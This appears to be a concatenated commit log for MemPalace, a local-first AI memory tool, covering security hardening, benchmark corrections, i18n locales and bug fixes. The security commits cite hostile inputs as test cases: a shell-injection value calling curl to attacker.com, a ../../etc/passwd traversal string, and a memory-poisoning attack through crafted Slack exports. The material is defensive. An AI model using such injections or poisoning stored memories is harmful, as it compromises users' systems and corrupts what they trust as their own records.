* fix: harden hooks against shell injection, path traversal, and arithmetic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
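
The Python-side validator can be sketched like this — a minimal sketch of the rules the commit describes (function name and exact checks are assumptions):

```python
import os

def validate_transcript_path(path):
    """Reject transcript paths containing parent-directory components
    or carrying an unexpected extension; empty paths are rejected."""
    if not path:
        return False
    # Normalize separators so Windows backslash paths are checked too.
    parts = path.replace("\\", "/").split("/")
    if ".." in parts:
        return False
    return os.path.splitext(path)[1] in (".jsonl", ".json")
```

Callers such as the message counter then return 0 for any path that fails validation instead of opening the file.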

* fix: add logging on rejected transcript paths and platform-native path test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809

* Increase visibility of fake website caution

Noticed a URL:
```
hXXps://www.mempalace[.]tech/
```

Though the README already warns about this domain, the caution is best surfaced prominently at the top of the README.

* fix: use permissive validator for KG entity values (closes #455)

sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.

* chore: bump plugin manifests to 3.3.0 and fix owner URL

Aligns marketplace.json and both plugin.json files with version.py /
pyproject.toml (already at 3.3.0) so `/plugin update` reflects the
v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps.

Also updates marketplace.json `owner.url` from the stale
github.com/milla-jovovich path to the current github.com/MemPalace org.

Refs #874

* ci: add version guard to catch tag/manifest drift

Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the
single source of truth per CLAUDE.md), and fails PRs that touch any
version file without keeping all five in sync (pyproject.toml,
version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json,
.codex-plugin/plugin.json).

Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0
tags all landed pointing at commits that still carried manifest version
3.0.14, blocking `/plugin update` for end users.

Refs #874

* ci: let semver pre-release tags bypass strict manifest match

Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as
internal/staging builds. They skip the tag-vs-manifest check because
pre-releases do not flow to end users via `/plugin update`, which reads
the manifest on the default branch.

Stable tags `vX.Y.Z` still require all five version sources to match
exactly, so the protection against the #874 drift remains intact. The
cross-file consistency check on PRs is unchanged — all manifests must
still agree with mempalace/version.py whenever any version file moves.
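
The combined guard logic from these two commits can be sketched in Python — a sketch only; the real check runs in CI shell, and the `__version__ = "..."` format in version.py is an assumption:

```python
import re

def check_tag_matches(tag, version_file_text):
    """Return True when a stable tag vX.Y.Z matches __version__ in
    version.py; pre-release tags (vX.Y.Z-*) bypass the check because
    they never flow to end users via /plugin update."""
    m = re.fullmatch(r"v(\d+\.\d+\.\d+)(-.*)?", tag)
    if not m:
        return False          # malformed tag: fail the guard
    if m.group(2):
        return True           # semver pre-release: internal build, skip
    found = re.search(r'__version__ = "([^"]+)"', version_file_text)
    return found is not None and m.group(1) == found.group(1)
```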

* fix: ship CNAME in Pages artifact to pin custom domain

Adds website/public/CNAME containing `mempalaceofficial.com` so the
VitePress build output always includes /CNAME in the Pages artifact.
Without this, the custom-domain setting is only held in the repo's
Pages API config — if it ever drifts (manual edit, org move, workflow
change), the site reverts to <org>.github.io with no record in source.

Note: this does not fix the current site outage. The root cause is DNS
— mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub
Pages IPs. That has to be fixed at the registrar. This commit is the
belt-and-suspenders so that once DNS is back, the domain is pinned in
source and the next workflow refactor can't accidentally drop it.

* docs: tighten SECURITY.md with real version policy and GHPVR-only channel

Builds on @Yorji-Porji's draft by fixing three issues before it lands:

- Replace the `< 1.0.0` placeholder table with MemPalace's actual
  support policy: current major (3.x) receives fixes, 2.x and earlier
  do not.
- Remove the `[Insert Maintainer Email Here]` placeholder and the
  email fallback. GitHub Private Vulnerability Reporting is enabled
  on this repo; the policy points there exclusively so there is no
  risk of a researcher emailing a dead address.
- Drop the meta-note ("Adjust the table above…") that was an
  instruction to the maintainer, not policy text.

Structure, triage timelines, and credit language are kept as drafted.

* fix: allow mining directories without local mempalace.yaml

When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.

* fix: remove unused sys import

* fix: send missing-yaml warning to stderr and flag basename collisions

Addresses review feedback on #604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.

* docs: name official domain and specific impostors in scam alert

Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in #877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.

* perf: optimize regex compilation in entity extraction

Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
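
A minimal illustration of the change — the pattern here is illustrative, not the actual dialect.py regex:

```python
import re

# Compiling once at module import avoids re-parsing the pattern on
# every iteration of a hot loop.
_CANDIDATE_RE = re.compile(r"[A-Z][a-z]+")

def extract_candidates(text):
    """Return capitalized-word candidates using the precompiled pattern."""
    return _CANDIDATE_RE.findall(text)
```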

* feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)

export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: add VSCode devcontainer matching CI environment

Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.

* fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph

* fix: replace invalid 'decision: allow' with {} in hooks

Closes #872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: add missing self._lock to KnowledgeGraph.close()

TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
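
A minimal sketch of the pattern: every method that touches the shared connection, including close(), acquires the lock first (class shape simplified from the commit description):

```python
import sqlite3
import threading

class KnowledgeGraph:
    """Sketch of the locking discipline: no access to self._connection
    outside a `with self._lock:` block."""

    def __init__(self, path=":memory:"):
        self._lock = threading.Lock()
        self._connection = sqlite3.connect(path, check_same_thread=False)

    def stats(self):
        with self._lock:
            return self._connection.execute("SELECT 1").fetchone()[0]

    def close(self):
        # The fix: close() was the last method mutating the connection
        # without holding the lock.
        with self._lock:
            if self._connection is not None:
                self._connection.close()
                self._connection = None
```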

* benchmarks: add --llm-backend ollama for non-Anthropic rerank

The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models

* benchmarks: apply ruff-format to llm_rerank (trivial line wrap)

* benchmarks: add v3.3.0 reproduction results + 50/450 split

Addresses #875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.

* docs: slim README and move corrections/notices to docs/HISTORY.md

Addresses #875. The previous README was 755 lines mixing six purposes
(scam alert, hero, two mea-culpa notes, install guide, architecture
explainer, API reference, file map). Rework it as a pure entry point:
what MemPalace is, how to install, honest benchmark numbers, links to
the website for concept/architecture documentation.

Key content changes:
 - Drop the "highest-scoring AI memory system ever benchmarked" framing.
 - New tagline: "Local-first AI memory. Verbatim storage, pluggable
   backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids
   naming a specific vector-store implementation since the backend is
   pluggable (see mempalace/backends/base.py).
 - Remove the cross-system comparison table. Retrieval recall (R@5)
   and end-to-end QA accuracy are different metrics and are not
   comparable; placing MemPalace's R@5 next to competitor QA accuracy
   under a single column header was a category error.
 - The "100%" LongMemEval headline is no longer the lead. The honest
   held-out figure is 98.4% R@5 on 450 unseen questions. The rerank
   pipeline reaches >=99% with any capable LLM (reproduced with
   Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level,
   not model-specific.
 - Benchmark reproduction commands now reference the correct repo
   (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch).

New file: docs/HISTORY.md as the canonical home for post-launch
corrections, public notices, and retractions. Contains verbatim:
 - 2026-04-14 note on this rewrite (links to #875)
 - 2026-04-11 impostor-domain notice (moved from README header)
 - 2026-04-07 "A Note from Milla & Ben" (moved from README body)

README keeps a one-line scam-alert callout that links to
docs/HISTORY.md for the full timeline.

* docs(website): align mempalaceofficial.com with honest benchmarks

Part of #875. Bring the VitePress site into line with the new README
and the reproducibility scorecard: drop category-error comparisons,
drop retracted claims, retain only metrics and caveats that survive
audit.

website/index.md
 - New tagline matches README (local-first, verbatim, pluggable backend,
   96.6% R@5 raw, zero API calls).
 - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra
   94.87% / Mem0 ~85%" comparison table with a single honest table
   showing MemPalace's own retrieval-recall numbers (raw 96.6%,
   hybrid v4 held-out 98.4%). Add an explicit sentence explaining why
   we no longer publish a cross-system table on the landing page
   (retrieval recall vs QA accuracy are different metrics).
 - Soften the "ChromaDB-powered vector search" feature blurb to be
   backend-agnostic, since the retrieval layer is pluggable.

website/reference/benchmarks.md
 - Full rewrite of the retrieval-recall tables. No more "100%"
   headline; honest held-out 98.4% R@5 replaces it. Added the
   model-agnostic rerank result (99.2% R@5 / 100% R@10 with
   minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
 - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row.
   With per-conversation session counts of 19-32 and top_k=50, the
   retrieval stage returns every session by construction — the number
   measures an LLM's reading comprehension, not retrieval.
 - Drop the cross-system comparison tables. Link out to each project's
   own research page (Mastra, Mem0, Supermemory) for their published
   numbers and metric definitions.
 - Rewrite reproduction commands to use the correct repository and
   demonstrate the new --llm-backend ollama flag.

website/concepts/the-palace.md
 - Remove the "+34%" row / paragraph. Wing/room filtering is standard
   metadata filtering in the vector store, not a novel retrieval
   mechanism — the April-7 note already retracted that framing; this
   finishes the retraction on the website where it had remained.

website/guide/searching.md
 - Same treatment for "34% retrieval improvement". Reframe as
   operational scoping, not a novel boost.

website/reference/contributing.md
 - Update the "palace structure matters" bullet to reflect the same
   framing: scoping-not-magic.

website/concepts/knowledge-graph.md
 - Replace the MemPalace-vs-Zep feature matrix with a short "related
   work" note that links to Zep's own documentation for authoritative
   details on their deployment model. Avoids claims we cannot verify
   at source.

* docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG

Remaining in-repo surfaces carrying the same retracted or broken
claims as the public pages fixed in the previous two commits.

CONTRIBUTING.md
 - "Palace structure matters ... 34% retrieval improvement" → reframed
   as scoping (same rewording applied to the website equivalents).

benchmarks/BENCHMARKS.md
 - Add a prominent "Important caveat" block at the top of the
   "Comparison vs Published Systems" table explaining that R@5
   (retrieval recall) and QA accuracy are different metrics, with
   citations to Mastra, Mem0, and Supermemory's own published
   methodology pages. Annotate the specific competitor rows whose
   numbers are QA accuracy, not retrieval recall.
 - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4
   → 100 step was tuned on 3 specific wrong answers (already disclosed
   further down in the doc under "Benchmark Integrity"); the honest
   hybrid figure is held-out 98.4%.
 - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points
   at anything; now `MemPalace/mempalace`.

benchmarks/README.md + benchmarks/HYBRID_MODE.md
 - Same clone-URL fix applied.

CHANGELOG.md
 - Add a ### Documentation entry under [Unreleased] v3.3.0 that names
   #875 and summarises the scope of the rewrite.

* docs+tests: fix CI after README slim (#875)

The regression-guard tests added in #835 were pinned to the old
README shape (tool table + file-reference table). When #897 slimmed
the README and moved that content to the website, three tests
started failing:

  TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
  TestNoUnlistedTools.test_no_undocumented_tools
  TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless

Changes in this commit:

1. Update the 3 tests to track the new canonical docs surfaces
   - Tool list -> website/reference/mcp-tools.md
     (tests parse `### \`mempalace_xxx\`` headings instead of
     markdown table rows).
   - dialect.py lossless disclaimer -> website/reference/modules.md
     (any line mentioning dialect.py must not also say "lossless").

2. Fix the website to make "no undocumented tools" true
   Add the 10 tools that existed in TOOLS but were missing from
   website/reference/mcp-tools.md (create_tunnel, delete_tunnel,
   follow_tunnels, list_tunnels, get_drawer, list_drawers,
   update_drawer, hook_settings, memories_filed_away, reconnect).
   Page header now correctly says "all 29 MCP tools".

3. Align pre-commit ruff pin to match CI (0.4.x)
   .pre-commit-config.yaml was pinning ruff v0.9.0, while
   .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two
   formatters produce incompatible output (e.g. v0.9.0 reformats
   `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects),
   which would cause the pre-commit hook to modify files that CI
   then flags as unformatted. Pinning the hook to v0.4.10 keeps
   the dev loop and CI in lock-step.

Full suite: 887 passed, 0 failed.

* fix: address i18n review issues from PR #718

Three issues flagged by bensig on the i18n PR before merge:

1. ko.json: status_drawers used {drawers} instead of {count}, causing
   the Korean UI to show the raw template string instead of the actual
   drawer count.  All other 7 languages use {count}.

2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py
   with a sys.path.insert hack.  Moved to tests/test_i18n.py per the
   project convention in AGENTS.md.

3. Dialect.from_config() passed lang=config.get("lang") which defaults
   to None, causing __init__ to inherit whatever language was loaded
   earlier via module-level state.  Now defaults to "en" explicitly so
   from_config is deterministic regardless of prior load_lang() calls.

Added two regression tests for the ko.json fix and the state leak.

* docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862)

Fixes #210.

The CLI requires a positional <dir> argument. Previous docs emphasized
that init 'sets up ~/.mempalace/' which misled users into expecting
no arguments. Now the docs show <dir> is required, offer '.' as the
usage for the current directory, and reword the description so the
project-directory scan is listed first.

* fix: make entity_registry.research() local-only by default (#811)

* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally,
sending entity names to en.wikipedia.org on every uncached lookup.
This violates the project's local-first and privacy-by-architecture
principles documented in CLAUDE.md.

Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person"
  with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling,
  and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research()
  so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure
  consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON
  constant shared by 3 test functions
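
Taken together, the two commits above amount to this cache discipline — a sketch with `lookup` standing in for the Wikipedia call and a plain dict for the cache:

```python
def research(word, cache, allow_network=False, lookup=None):
    """Local-only by default: uncached words return 'unknown' unless
    the caller opts into network lookups. The read path uses .get()
    so it never mutates the cache; only the network-write path does."""
    cached = cache.get(word)
    if cached is not None:
        return cached
    if not allow_network or lookup is None:
        return "unknown"
    result = lookup(word)
    if result != "unknown":
        # Only confirmed results are persisted, so a 404 can't poison
        # the registry with a false "person" entry.
        cache.setdefault(word, result)
    return result
```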

* fix: return empty status instead of error on cold-start palace (#830) (#831)

tool_status() called _get_collection() with the default create=False,
which throws when the ChromaDB collection does not exist yet (valid
palace, zero drawers). The exception was swallowed and status returned
"No palace found" even though init had completed successfully.

Switching to create=True bootstraps an empty collection on first
status call, matching what the write path already does.

Fix suggested by @hkevinchu in the issue.

* fix(searcher): guard against empty ChromaDB query results (#195) (#865)

Fixes #195.

When ChromaDB returns no documents (empty palace, or wing/room filter
that excludes everything), it returns the shape:

    {"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of
the expected 'no results' response. Affected: searcher.search(),
searcher.search_memories() (drawer + closet branches plus the
total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that
safely extracts the inner list, returning [] for any of: missing key,
empty outer list, [None], or [[]]. layers.py imports the same helper to
avoid duplicating the guard.

Tests: tests/test_empty_chromadb_results.py covers all observed shapes
plus a documentation-style test that pins the original IndexError so
future readers understand why the helper exists.
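
A sketch of the helper's contract (name per the commit; exact placement in searcher.py assumed):

```python
def first_or_empty(results, key):
    """Safely extract the inner list from a ChromaDB-style query
    result. Returns [] for any of: missing key, empty outer list,
    [None], or [[]] — the shapes observed in #195."""
    outer = results.get(key) or []
    if not outer:
        return []
    return outer[0] or []
```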

* fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)

Partially addresses #185.

`mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into
the project root. When <dir> is a git repository, those files have no
default protection and risk being committed by accident — the loudest
concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the
end of cmd_init: if <dir>/.git exists, append the two filenames to
.gitignore (creating it if necessary) under a clearly-marked block.

The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines

This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the
issue's 'Expected' section proposes — that's a behavioral change with
miner/config implications and warrants a separate design discussion.
The gitignore safeguard removes the immediate risk without breaking any
existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering
no-op, fresh creation, partial append, idempotency, and missing-newline
edge case.

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225.

Several transitive dependencies (chromadb, onnxruntime, posthog) print
banners and warnings to stdout — sometimes at the C level — during the
mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC
over stdio, any non-JSON output on stdout corrupted the message stream
and broke Claude Desktop's parser with errors like:

  MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
  MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
  MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude
Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level
(sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1))
to catch C-level prints, while preserving the real stdout for later
restore. main() calls _restore_stdout() right before entering the
protocol loop so JSON-RPC responses still go to the real stdout.

Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout
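
The redirect/restore dance can be sketched as follows (function and global names are illustrative, not the module's real identifiers):

```python
import os
import sys

_REAL_STDOUT_FD = None

def protect_stdout():
    """Redirect stdout to stderr at both the Python level and the
    file-descriptor level so C-level prints from noisy imports can't
    corrupt a stdio JSON-RPC channel."""
    global _REAL_STDOUT_FD
    _REAL_STDOUT_FD = os.dup(1)   # preserve the real stdout for later
    sys.stdout = sys.stderr       # catches Python-level print()
    os.dup2(2, 1)                 # catches C-level writes to fd 1

def restore_stdout():
    """Point fd 1 and sys.stdout back at the real stdout, right
    before entering the protocol loop."""
    global _REAL_STDOUT_FD
    if _REAL_STDOUT_FD is not None:
        os.dup2(_REAL_STDOUT_FD, 1)
        os.close(_REAL_STDOUT_FD)
        _REAL_STDOUT_FD = None
    sys.stdout = sys.__stdout__
```

Calling restore twice is safe: the guard makes the fd restore idempotent.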

* style: reformat with ruff 0.4 (CI version) for #225

* fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)

* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"},
which in Claude Code means "cancel compaction" with no retry mechanism.
This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data
lands before compaction) and return {"decision": "allow"}. This matches
the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact
can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the
full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid "allow" decision value

Claude Code only recognizes "block" as a top-level decision value.
"allow" is a permissionDecision value for PreToolUse hooks, not a
valid top-level decision. The correct way to not block is to return
empty JSON. Caught by #872.

* feat: include created_at timestamp in search results (#846)

* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result
objects returned by search_memories(). Enables temporal reasoning over
search hits without additional queries.

* feat: add fallback for missing filed_at metadata

* fix: add provenance header and speaker IDs to Slack transcript imports (#815)

* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently
the "user" or "assistant". The parser previously assigned these roles
purely by position, allowing a crafted export to place attacker text
in the "user" role — making it appear as the memory owner's words
in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party
  with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.)
  so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking
  compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming
  a standalone ChromaDB drawer via paragraph chunking on exports
  with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and
  control characters to prevent chunk-boundary injection via crafted
  Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant,
  consistent with _TOOL_RESULT_* constants pattern; tests import it
  instead of duplicating the literal

Refs: MemPalace/mempalace#809
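
The sanitization step can be sketched as follows (character classes per the commit; the exact regex is an assumption):

```python
import re

# Control characters including newline and DEL.
_CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")

def sanitize_speaker_id(raw):
    """Strip brackets, newlines, and control characters from a Slack
    speaker id so a crafted export can't forge [U1]-style prefixes or
    inject chunk boundaries."""
    cleaned = _CONTROL_RE.sub("", raw)
    return cleaned.replace("[", "").replace("]", "")
```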

* fix: restrict file permissions on sensitive palace data (#814)

* fix: restrict file permissions on sensitive palace data

On Linux with default umask (022), several files and directories
containing personal data were created world-readable. This patch
applies chmod 0o700 to directories and 0o600 to files immediately
after creation, wrapped in try/except for Windows compatibility.

Files hardened:
- hooks_cli.py: hook_state/ directory and hook.log
- entity_registry.py: entity_registry.json (names, relationships)
- knowledge_graph.py: knowledge_graph.sqlite3 parent directory
- exporter.py: export output directory and wing subdirectories
- config.py: people_map.json (name mappings)
- mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix)

Refs: MemPalace/mempalace#809

* fix: avoid redundant chmod calls on hot paths

- hooks_cli.py: chmod STATE_DIR and hook.log only on first creation,
  not on every _log() call (hooks fire on every Stop event)
- exporter.py: track created wing dirs to skip redundant makedirs +
  chmod on the same directory across batches
- mcp_server.py: remove redundant _WAL_FILE.chmod after os.open
  already set mode=0o600 atomically

Refs: MemPalace/mempalace#809

* test: add palace_graph tunnel helper coverage

Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`.

Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`

* refactor(entity_detector): make multi-language extensible via i18n JSON

Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.

Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
  patterns across requested languages, dedupes lists, unions stopwords,
  and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
  override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
  Devanagari, CJK) can register their own character classes instead of
  being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
  callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.

This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.

* test: document orphan-locale recovery for _temp_locale helper

* feat: add Russian language support to i18n module

Add ru.json with full Russian translations for CLI strings, palace
terminology, AAAK compression instruction, and regex patterns for
topic/action extraction with Cyrillic character classes.

No code changes needed -- the i18n module auto-discovers language
files via *.json glob in the i18n directory.

* feat(i18n): add entity detection section to Russian locale

Cyrillic candidate/multi-word patterns, person-verb patterns
(сказал, спросил, ответил, etc.), pronoun patterns, dialogue
markers, direct address, and Russian stopwords.

Follows the i18n entity framework from #911.

* fix(i18n): apply review feedback on ru.json (#760)

- mine_skip: "повторной раскопки" -> "повторной обработки"
- quote_pattern: add Russian guillemet quotes «»

Co-Authored-By: almirus <almirus@users.noreply.github.com>

* feat(i18n): expand Russian entity stopwords with prepositions and conjunctions

Adds 34 prepositions and conjunctions to reduce false positives
in entity detection when these words appear sentence-initial.

Co-Authored-By: almirus <almirus@users.noreply.github.com>

* feat: add italian i18n support

* feat: add italian entity patterns

* Update hi.json with entity-section infrastructure: pronoun_patterns, dialogue_patterns, direct_address_pattern, project_verb_patterns, and stopwords

* feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117)

CLI strings, AAAK instruction, regex patterns, and entity section
with person-verb, pronoun, dialogue, and candidate patterns for
Latin+diacritics names (João, Inês, Ângela).

Follows the i18n entity framework from #911.

* fix(i18n): address review feedback on pt-br.json

- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

* feat(cli): add version display and version flag to CLI

Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit.

* fix(i18n): resolve language codes case-insensitively (#927)

